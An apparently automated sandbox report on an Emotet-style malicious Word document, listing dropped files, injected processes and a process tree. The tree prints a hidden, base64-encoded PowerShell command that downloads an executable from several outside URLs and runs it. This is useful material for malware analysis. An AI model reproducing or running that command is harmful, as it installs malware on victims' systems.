Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe File renamed C:\Users\Admin\177.exe => C:\Windows\SysWOW64\publishmailbox.exe 177.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat publishmailbox.exe File deleted C:\Windows\System32\spool\drivers\x64\3\mxdwdui.BUD WINWORD.EXE File created C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdui.BUD WINWORD.EXE File opened for modification C:\Windows\system32\GDIPFONTCACHEV1.DAT WINWORD.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1296 WINWORD.EXE 1936 conhost.exe 2012 177.exe 1052 177.exe 1196 publishmailbox.exe 1348 publishmailbox.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 924 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 924 Powershell.exe 1348 publishmailbox.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 924 wrote to memory of 2012 924 Powershell.exe 31 PID 2012 wrote to memory of 1052 2012 177.exe 32 PID 1196 wrote to memory of 1348 1196 publishmailbox.exe 34 -
Executes dropped EXE 4 IoCs
pid Process 2012 177.exe 1052 177.exe 1196 publishmailbox.exe 1348 publishmailbox.exe -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 1052 177.exe 1348 publishmailbox.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_cc7d6d8e28fce962e81a6ba5c82f29bb.110.doc"1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:1296
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABZAGwAcABnAGQAegBtAGIAPQAnAFUAcwBzAGIAYgBtAHoAaAB1AGgAeABrAGUAJwA7ACQATABnAGUAZABrAGsAZABxAHcAIAA9ACAAJwAxADcANwAnADsAJABJAHoAegBxAHoAaABxAHoAdAB5AHoAPQAnAEEAaQBkAHcAagBxAG4AbABjAGoAeABlAGoAJwA7ACQARABiAGIAcwBrAHAAdwBhAHoAdgBmAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABMAGcAZQBkAGsAawBkAHEAdwArACcALgBlAHgAZQAnADsAJABFAG4AaABsAGsAcABxAG0APQAnAFkAbQBjAHQAaABjAG4AagBrAHUAeQAnADsAJABCAHkAdwB3AG0AegB5AHAAbgBlAD0AJgAoACcAbgBlAHcAJwArACcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAVAAuAFcARQBCAEMATABJAEUAbgBUADsAJABGAGkAdgBsAHcAbAB6AG8AeQB1AHUAdABsAD0AJwBoAHQAdABwADoALwAvAGEAYwBxAHUAYQAuAHMAbwBsAGEAcgBjAHkAdABlAGMALgBjAG8AbQAvAHIAdABzAGIAZwBzAC8AWABpAFcAbQB0AFkAWQB1AHIALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGwAbwBnAC4AbABlAGEAcgBuAGMAeQAuAG4AZQB0AC8AdwBwAC0AYQBkAG0AaQBuAC8AdQBzAGUAcgAvAG8AeABaAHEAUQBwAC8AKgBoAHQAdABwADoALwAvAGgAbwBzAHAAaQB0AGEAbABzAGEAbgByAGEAZgBhAGUAbAAuAGEAaQBuAGkAbQBlAGQAaQBuAGEALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHYAdwBmAC0AaQA4AGcAZQAtADQANAA0ADUAOQAxADcALwAqAGgAdAB0AHAAcwA6AC8ALwBzAGcANwA3ADEALgBrAHcAaQBrAGYAdQBuAG4AZQBsAHMALgBjAG8AbQAvAHAAaABwAG0AeQBhAGQAbQBpAG4AXwBiAGMAawAvAHgAOQB0AGYAbgAtAGwAdgAxAGgANAAtADEANwA0ADEAMgA5ADUAOQA2AC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AcwBpAHkAaQBuAGoAaQBjAGgAYQBuAGcAagBpAGEALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBXAFkAcwB6AHMAUAAvACcALgAiAFMAYABQAGwASQB0ACIAKAAnACoAJwApADsAJABVAG4AaABjAGcAcQBiAG0AcABmAG0APQAnAFIAbgBmAGgAagB3AGIAaABsACcAOwBmAG8AcgBlAGEAYwBoACgAJABIAHQAYwBjAG0AbABwAGMAcwBsAGsAagAgAGkAbgAgACQARgBpAHYAbAB3AGwAegBvAHkAdQB1AHQAbAApAHsAdAByAHkAewAkAEIAeQB3AHcAbQB6AHkAcABuAGUALgAiAEQAbwB3AE4AbABvAGAAQQBkAGYAYABJAEwAZQAiACgAJABIAHQAYwBjAG0AbABwAGMAcwBsAGsAagAsACAAJABEAGIAYgBzAGsAcAB3AGEAegB2AGYAKQA7ACQAUwB1AGcAawB1AHoAaQBmAGwAeQA9ACcAQwBuAGoAdgBhAGMAaQBnAHEAeQBhAGwAegAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEQAYgBiAHMAawBwAHcAYQB6AHYAZgApAC4AIgBMAGAARQBOAGcAYABUAGgAIgAgAC0AZwBlACAAMgAyADkAMAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAdABhAGAAUgB0ACIAKAAkAEQAYgBiAHMAawBwAHcAYQB6AHYAZgApADsAJABDAHIAZwBpAGsAdwBqAGwAawBxAD0AJwBYAGgAagBoAGUAcQBkAHQAegBhAGEAJwA7AGIAcgBlAGEAawA7ACQAVwB2AHQAdQB2AGwAcgB3AD0AJwBUAHMAZQBuAGYAZQB5AGwAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBqAGoAcAB0AGcAaQBhAGsAawA9ACcAQgBmAG4AYgBwAHIAcABmAGEAdQBhACcA1⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Users\Admin\177.exe"C:\Users\Admin\177.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:2012 -
C:\Users\Admin\177.exe--653e7fcf3⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
PID:1052
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1003057684324364423430350252008227691971696020-12325563152092719173-1366370866"1⤵
- Suspicious use of SetWindowsHookEx
PID:1936
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:1412
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"1⤵PID:1356
-
C:\Windows\SysWOW64\publishmailbox.exe"C:\Windows\SysWOW64\publishmailbox.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:1196 -
C:\Windows\SysWOW64\publishmailbox.exe--22acc9772⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
PID:1348
-